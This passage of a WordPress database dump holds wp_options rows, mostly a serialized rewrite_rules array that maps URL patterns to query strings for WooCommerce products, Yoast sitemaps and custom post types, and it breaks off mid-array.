INSERT INTO `wp_options` VALUES (223064, 'wpseo_sitemap_2322_cache_validator', '5qaX6', 'no'); 
INSERT INTO `wp_options` VALUES (233358, 'wpseo_sitemap_2375_cache_validator', '4Km81', 'no'); 
INSERT INTO `wp_options` VALUES (234297, 'wpseo_sitemap_2381_cache_validator', '4RQVs', 'no'); 
INSERT INTO `wp_options` VALUES (236318, 'wpseo_sitemap_2390_cache_validator', '5aN3n', 'no'); 
INSERT INTO `wp_options` VALUES (238881, 'wpseo_sitemap_2410_cache_validator', '5ITSf', 'no'); 
INSERT INTO `wp_options` VALUES (286581, 'rewrite_rules', 'a:352:{s:9:"blocks/?$";s:26:"index.php?post_type=blocks";s:39:"blocks/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?post_type=blocks&feed=$matches[1]";s:34:"blocks/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?post_type=blocks&feed=$matches[1]";s:26:"blocks/page/([0-9]{1,})/?$";s:44:"index.php?post_type=blocks&paged=$matches[1]";s:24:"^wc-auth/v([1]{1})/(.*)?";s:63:"index.php?wc-auth-version=$matches[1]&wc-auth-route=$matches[2]";s:22:"^wc-api/v([1-3]{1})/?$";s:51:"index.php?wc-api-version=$matches[1]&wc-api-route=/";s:24:"^wc-api/v([1-3]{1})(.*)?";s:61:"index.php?wc-api-version=$matches[1]&wc-api-route=$matches[2]";s:19:"sitemap_index\\.xml$";s:19:"index.php?sitemap=1";s:31:"([^/]+?)-sitemap([0-9]+)?\\.xml$";s:51:"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]";s:24:"([a-z]+)?-?sitemap\\.xsl$";s:25:"index.php?xsl=$matches[1]";s:7:"shop/?$";s:27:"index.php?post_type=product";s:37:"shop/feed/(feed|rdf|rss|rss2|atom)/?$";s:44:"index.php?post_type=product&feed=$matches[1]";s:32:"shop/(feed|rdf|rss|rss2|atom)/?$";s:44:"index.php?post_type=product&feed=$matches[1]";s:24:"shop/page/([0-9]{1,})/?$";s:45:"index.php?post_type=product&paged=$matches[1]";s:11:"^wp-json/?$";s:22:"index.php?rest_route=/";s:14:"^wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:16:"featured_item/?$";s:33:"index.php?post_type=featured_item";s:46:"featured_item/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_type=featured_item&feed=$matches[1]";s:41:"featured_item/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_type=featured_item&feed=$matches[1]";s:33:"featured_item/page/([0-9]{1,})/?$";s:51:"index.php?post_type=featured_item&paged=$matches[1]";s:11:"sidebars/?$";s:27:"index.php?post_type=sidebar";s:41:"sidebars/feed/(feed|rdf|rss|rss2|atom)/?$";s:44:"index.php?post_type=sidebar&feed=$matches[1]";s:36:"sidebars/(feed|rdf|rss|rss2|atom)/?$";s:44:"index.php?post_type=sidebar&feed=$matches[1]";s:28:"sidebars/page/([0-9]{1,})/?$";s:45:"index.php?post_type=sidebar&paged=$matches[1]";s:32:"blocks/.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:42:"blocks/.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:62:"blocks/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:57:"blocks/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:57:"blocks/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:38:"blocks/.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:21:"blocks/(.+?)/embed/?$";s:39:"index.php?blocks=$matches[1]&embed=true";s:25:"blocks/(.+?)/trackback/?$";s:33:"index.php?blocks=$matches[1]&tb=1";s:45:"blocks/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:45:"index.php?blocks=$matches[1]&feed=$matches[2]";s:40:"blocks/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:45:"index.php?blocks=$matches[1]&feed=$matches[2]";s:33:"blocks/(.+?)/page/?([0-9]{1,})/?$";s:46:"index.php?blocks=$matches[1]&paged=$matches[2]";s:40:"blocks/(.+?)/comment-page-([0-9]{1,})/?$";s:46:"index.php?blocks=$matches[1]&cpage=$matches[2]";s:30:"blocks/(.+?)/wc-api(/(.*))?/?$";s:47:"index.php?blocks=$matches[1]&wc-api=$matches[3]";s:36:"blocks/.+?/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:47:"blocks/.+?/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:29:"blocks/(.+?)(?:/([0-9]+))?/?$";s:45:"index.php?blocks=$matches[1]&page=$matches[2]";s:47:"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:42:"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:23:"category/(.+?)/embed/?$";s:46:"index.php?category_name=$matches[1]&embed=true";s:35:"category/(.+?)/page/?([0-9]{1,})/?$";s:53:"index.php?category_name=$matches[1]&paged=$matches[2]";s:32:"category/(.+?)/wc-api(/(.*))?/?$";s:54:"index.php?category_name=$matches[1]&wc-api=$matches[3]";s:17:"category/(.+?)/?$";s:35:"index.php?category_name=$matches[1]";s:44:"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:39:"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:20:"tag/([^/]+)/embed/?$";s:36:"index.php?tag=$matches[1]&embed=true";s:32:"tag/([^/]+)/page/?([0-9]{1,})/?$";s:43:"index.php?tag=$matches[1]&paged=$matches[2]";s:29:"tag/([^/]+)/wc-api(/(.*))?/?$";s:44:"index.php?tag=$matches[1]&wc-api=$matches[3]";s:14:"tag/([^/]+)/?$";s:25:"index.php?tag=$matches[1]";s:45:"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:40:"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:21:"type/([^/]+)/embed/?$";s:44:"index.php?post_format=$matches[1]&embed=true";s:33:"type/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?post_format=$matches[1]&paged=$matches[2]";s:15:"type/([^/]+)/?$";s:33:"index.php?post_format=$matches[1]";s:60:"yst_prominent_words/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:58:"index.php?yst_prominent_words=$matches[1]&feed=$matches[2]";s:55:"yst_prominent_words/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:58:"index.php?yst_prominent_words=$matches[1]&feed=$matches[2]";s:36:"yst_prominent_words/([^/]+)/embed/?$";s:52:"index.php?yst_prominent_words=$matches[1]&embed=true";s:48:"yst_prominent_words/([^/]+)/page/?([0-9]{1,})/?$";s:59:"index.php?yst_prominent_words=$matches[1]&paged=$matches[2]";s:30:"yst_prominent_words/([^/]+)/?$";s:41:"index.php?yst_prominent_words=$matches[1]";s:57:"block_categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:55:"index.php?block_categories=$matches[1]&feed=$matches[2]";s:52:"block_categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:55:"index.php?block_categories=$matches[1]&feed=$matches[2]";s:33:"block_categories/([^/]+)/embed/?$";s:49:"index.php?block_categories=$matches[1]&embed=true";s:45:"block_categories/([^/]+)/page/?([0-9]{1,})/?$";s:56:"index.php?block_categories=$matches[1]&paged=$matches[2]";s:27:"block_categories/([^/]+)/?$";s:38:"index.php?block_categories=$matches[1]";s:34:"nf_sub/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:44:"nf_sub/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:64:"nf_sub/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"nf_sub/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"nf_sub/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:40:"nf_sub/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:23:"nf_sub/([^/]+)/embed/?$";s:39:"index.php?nf_sub=$matches[1]&embed=true";s:27:"nf_sub/([^/]+)/trackback/?$";s:33:"index.php?nf_sub=$matches[1]&tb=1";s:35:"nf_sub/([^/]+)/page/?([0-9]{1,})/?$";s:46:"index.php?nf_sub=$matches[1]&paged=$matches[2]";s:42:"nf_sub/([^/]+)/comment-page-([0-9]{1,})/?$";s:46:"index.php?nf_sub=$matches[1]&cpage=$matches[2]";s:32:"nf_sub/([^/]+)/wc-api(/(.*))?/?$";s:47:"index.php?nf_sub=$matches[1]&wc-api=$matches[3]";s:38:"nf_sub/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:49:"nf_sub/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:31:"nf_sub/([^/]+)(?:/([0-9]+))?/?$";s:45:"index.php?nf_sub=$matches[1]&page=$matches[2]";s:23:"nf_sub/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:33:"nf_sub/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:53:"nf_sub/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:48:"nf_sub/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:48:"nf_sub/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:29:"nf_sub/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:48:"chemicals/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?product_cat=$matches[1]&feed=$matches[2]";s:43:"chemicals/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?product_cat=$matches[1]&feed=$matches[2]";s:24:"chemicals/(.+?)/embed/?$";s:44:"index.php?product_cat=$matches[1]&embed=true";s:36:"chemicals/(.+?)/page/?([0-9]{1,})/?$";s:51:"index.php?product_cat=$matches[1]&paged=$matches[2]";s:18:"chemicals/(.+?)/?$";s:33:"index.php?product_cat=$matches[1]";s:52:"product-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?product_tag=$matches[1]&feed=$matches[2]";s:47:"product-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?product_tag=$matches[1]&feed=$matches[2]";s:28:"product-tag/([^/]+)/embed/?$";s:44:"index.php?product_tag=$matches[1]&embed=true";s:40:"product-tag/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?product_tag=$matches[1]&paged=$matches[2]";s:22:"product-tag/([^/]+)/?$";s:33:"index.php?product_tag=$matches[1]";s:35:"product/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:45:"product/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:65:"product/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:60:"product/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:60:"product/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:41:"product/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:24:"product/([^/]+)/embed/?$";s:40:"index.php?product=$matches[1]&embed=true";s:28:"product/([^/]+)/trackback/?$";s:34:"index.php?product=$matches[1]&tb=1";s:48:"product/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:46:"index.php?product=$matches[1]&feed=$matches[2]";s:43:"product/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:46:"index.php?product=$matches[1]&feed=$matches[2]";s:36:"product/([^/]+)/page/?([0-9]{1,})/?$";s:47:"index.php?product=$matches[1]&paged=$matches[2]";s:43:"product/([^/]+)/comment-page-([0-9]{1,})/?$";s:47:"index.php?product=$matches[1]&cpage=$matches[2]";s:33:"product/([^/]+)/wc-api(/(.*))?/?$";s:48:"index.php?product=$matches[1]&wc-api=$matches[3]";s:39:"product/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:50:"product/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:32:"product/([^/]+)(?:/([0-9]+))?/?$";s:46:"index.php?product=$matches[1]&page=$matches[2]";s:24:"product/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:34:"product/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:54:"product/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:49:"product/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:49:"product/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:30:"product/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:45:"product_variation/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:55:"product_variation/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:75:"product_variation/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:70:"product_variation/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:70:"product_variation/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:51:"product_variation/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:34:"product_variation/([^/]+)/embed/?$";s:50:"index.php?product_variation=$matches[1]&embed=true";s:38:"product_variation/([^/]+)/trackback/?$";s:44:"index.php?product_variation=$matches[1]&tb=1";s:46:"product_variation/([^/]+)/page/?([0-9]{1,})/?$";s:57:"index.php?product_variation=$matches[1]&paged=$matches[2]";s:53:"product_variation/([^/]+)/comment-page-([0-9]{1,})/?$";s:57:"index.php?product_variation=$matches[1]&cpage=$matches[2]";s:43:"product_variation/([^/]+)/wc-api(/(.*))?/?$";s:58:"index.php?product_variation=$matches[1]&wc-api=$matches[3]";s:49:"product_variation/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:60:"product_variation/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:42:"product_variation/([^/]+)(?:/([0-9]+))?/?$";s:56:"index.php?product_variation=$matches[1]&page=$matches[2]";s:34:"product_variation/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:44:"product_variation/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:64:"product_variation/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"product_variation/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"product_variation/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:40:"product_variation/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:45:"shop_order_refund/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:55:"shop_order_refund/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:75:"shop_order_refund/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:70:"shop_order_refund/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:70:"shop_order_refund/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:51:"shop_order_refund/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:34:"shop_order_refund/([^/]+)/embed/?$";s:50:"index.php?shop_order_refund=$matches[1]&embed=true";s:38:"shop_order_refund/([^/]+)/trackback/?$";s:44:"index.php?shop_order_refund=$matches[1]&tb=1";s:46:"shop_order_refund/([^/]+)/page/?([0-9]{1,})/?$";s:57:"index.php?shop_order_refund=$matches[1]&paged=$matches[2]";s:53:"shop_order_refund/([^/]+)/comment-page-([0-9]{1,})/?$";s:57:"index.php?shop_order_refund=$matches[1]&cpage=$matches[2]";s:43:"shop_order_refund/([^/]+)/wc-api(/(.*))?/?$";s:58:"index.php?shop_order_refund=$matches[1]&wc-api=$matches[3]";s:49:"shop_order_refund/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:60:"shop_order_refund/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:42:"shop_order_refund/([^/]+)(?:/([0-9]+))?/?$";s:56:"index.php?shop_order_refund=$matches[1]&page=$matches[2]";s:34:"shop_order_refund/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:44:"shop_order_refund/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:64:"shop_order_refund/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"shop_order_refund/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"shop_order_refund/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:40:"shop_order_refund/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:39:"dp_template/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:49:"dp_template/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:69:"dp_template/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:64:"dp_template/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:64:"dp_template/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:45:"dp_template/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:28:"dp_template/([^/]+)/embed/?$";s:59:"index.php?post_type=dp_template&name=$matches[1]&embed=true";s:32:"dp_template/([^/]+)/trackback/?$";s:53:"index.php?post_type=dp_template&name=$matches[1]&tb=1";s:40:"dp_template/([^/]+)/page/?([0-9]{1,})/?$";s:66:"index.php?post_type=dp_template&name=$matches[1]&paged=$matches[2]";s:47:"dp_template/([^/]+)/comment-page-([0-9]{1,})/?$";s:66:"index.php?post_type=dp_template&name=$matches[1]&cpage=$matches[2]";s:37:"dp_template/([^/]+)/wc-api(/(.*))?/?$";s:67:"index.php?post_type=dp_template&name=$matches[1]&wc-api=$matches[3]";s:43:"dp_template/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:54:"dp_template/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:36:"dp_template/([^/]+)(?:/([0-9]+))?/?$";s:65:"index.php?post_type=dp_template&name=$matches[1]&page=$matches[2]";s:28:"dp_template/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:38:"dp_template/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:58:"dp_template/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:53:"dp_template/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:53:"dp_template/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:34:"dp_template/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:41:"decision_tree/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:51:"decision_tree/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:71:"decision_tree/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:66:"decision_tree/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:66:"decision_tree/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:47:"decision_tree/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:30:"decision_tree/([^/]+)/embed/?$";s:61:"index.php?post_type=decision_tree&name=$matches[1]&embed=true";s:34:"decision_tree/([^/]+)/trackback/?$";s:55:"index.php?post_type=decision_tree&name=$matches[1]&tb=1";s:42:"decision_tree/([^/]+)/page/?([0-9]{1,})/?$";s:68:"index.php?post_type=decision_tree&name=$matches[1]&paged=$matches[2]";s:49:"decision_tree/([^/]+)/comment-page-([0-9]{1,})/?$";s:68:"index.php?post_type=decision_tree&name=$matches[1]&cpage=$matches[2]";s:39:"decision_tree/([^/]+)/wc-api(/(.*))?/?$";s:69:"index.php?post_type=decision_tree&name=$matches[1]&wc-api=$matches[3]";s:45:"decision_tree/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:56:"decision_tree/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:38:"decision_tree/([^/]+)(?:/([0-9]+))?/?$";s:67:"index.php?post_type=decision_tree&name=$matches[1]&page=$matches[2]";s:30:"decision_tree/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:40:"decision_tree/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:60:"decision_tree/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:55:"decision_tree/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:55:"decision_tree/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:36:"decision_tree/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:34:"ywtm_tab/.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:44:"ywtm_tab/.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:64:"ywtm_tab/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"ywtm_tab/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:59:"ywtm_tab/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:40:"ywtm_tab/.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:23:"ywtm_tab/(.+?)/embed/?$";s:41:"index.php?ywtm_tab=$matches[1]&embed=true";s:27:"ywtm_tab/(.+?)/trackback/?$";s:35:"index.php?ywtm_tab=$matches[1]&tb=1";s:35:"ywtm_tab/(.+?)/page/?([0-9]{1,})/?$";s:48:"index.php?ywtm_tab=$matches[1]&paged=$matches[2]";s:42:"ywtm_tab/(.+?)/comment-page-([0-9]{1,})/?$";s:48:"index.php?ywtm_tab=$matches[1]&cpage=$matches[2]";s:32:"ywtm_tab/(.+?)/wc-api(/(.*))?/?$";s:49:"index.php?ywtm_tab=$matches[1]&wc-api=$matches[3]";s:38:"ywtm_tab/.+?/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:49:"ywtm_tab/.+?/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:31:"ywtm_tab/(.+?)(?:/([0-9]+))?/?$";s:47:"index.php?ywtm_tab=$matches[1]&page=$matches[2]";s:39:"featured_item/.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:49:"featured_item/.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:69:"featured_item/.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:64:"featured_item/.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:64:"featured_item/.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:45:"featured_item/.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:28:"featured_item/(.+?)/embed/?$";s:46:"index.php?featured_item=$matches[1]&embed=true";s:32:"featured_item/(.+?)/trackback/?$";s:40:"index.php?featured_item=$matches[1]&tb=1";s:52:"featured_item/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?featured_item=$matches[1]&feed=$matches[2]";s:47:"featured_item/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?featured_item=$matches[1]&feed=$matches[2]";s:40:"featured_item/(.+?)/page/?([0-9]{1,})/?$";s:53:"index.php?featured_item=$matches[1]&paged=$matches[2]";s:47:"featured_item/(.+?)/comment-page-([0-9]{1,})/?$";s:53:"index.php?featured_item=$matches[1]&cpage=$matches[2]";s:37:"featured_item/(.+?)/wc-api(/(.*))?/?$";s:54:"index.php?featured_item=$matches[1]&wc-api=$matches[3]";s:43:"featured_item/.+?/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:54:"featured_item/.+?/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:36:"featured_item/(.+?)(?:/([0-9]+))?/?$";s:52:"index.php?featured_item=$matches[1]&page=$matches[2]";s:63:"featured_item_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:61:"index.php?featured_item_category=$matches[1]&feed=$matches[2]";s:58:"featured_item_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:61:"index.php?featured_item_category=$matches[1]&feed=$matches[2]";s:39:"featured_item_category/([^/]+)/embed/?$";s:55:"index.php?featured_item_category=$matches[1]&embed=true";s:51:"featured_item_category/([^/]+)/page/?([0-9]{1,})/?$";s:62:"index.php?featured_item_category=$matches[1]&paged=$matches[2]";s:33:"featured_item_category/([^/]+)/?$";s:44:"index.php?featured_item_category=$matches[1]";s:58:"featured_item_tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:56:"index.php?featured_item_tag=$